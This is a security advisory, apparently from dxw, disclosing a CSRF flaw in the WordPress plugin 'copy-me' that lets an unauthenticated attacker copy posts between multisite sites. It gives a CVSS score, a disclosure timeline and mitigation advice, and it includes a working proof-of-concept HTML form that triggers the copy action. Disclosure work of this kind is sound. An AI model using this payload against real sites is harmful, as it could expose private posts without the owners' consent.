copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts

Vulnerability

Last revised: December 7, 2016

This plugin does not use nonces. Copying posts could allow taking a secret post from a non-public site within a multisite installation and moving it to a public site.

Current state: Reported

CVSS Summary

CVSS base scores for this vulnerability
Score	4.3 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	None
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Click submit and it’ll copy post with ID 1 to blog/site with ID 1:

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="copyme_copy_item">
  <input type="text" name="id" value="1">
  <input type="text" name="target" value="1">
  <input type="submit">
</form>

Advisory timeline

2016-11-01: Discovered
2016-12-07: Reported to vendor via contact form: http://www.alancesarini.com/en/contact-2/
2016-12-07: Requested CVE
2016-12-21: Vendor has not responded after 14 days
2016-12-21: Published
2017-09-29: Requested CVE

Mitigation/further actions

Disable the plugin. No fixed version is known.

dxw advisories

Advisory: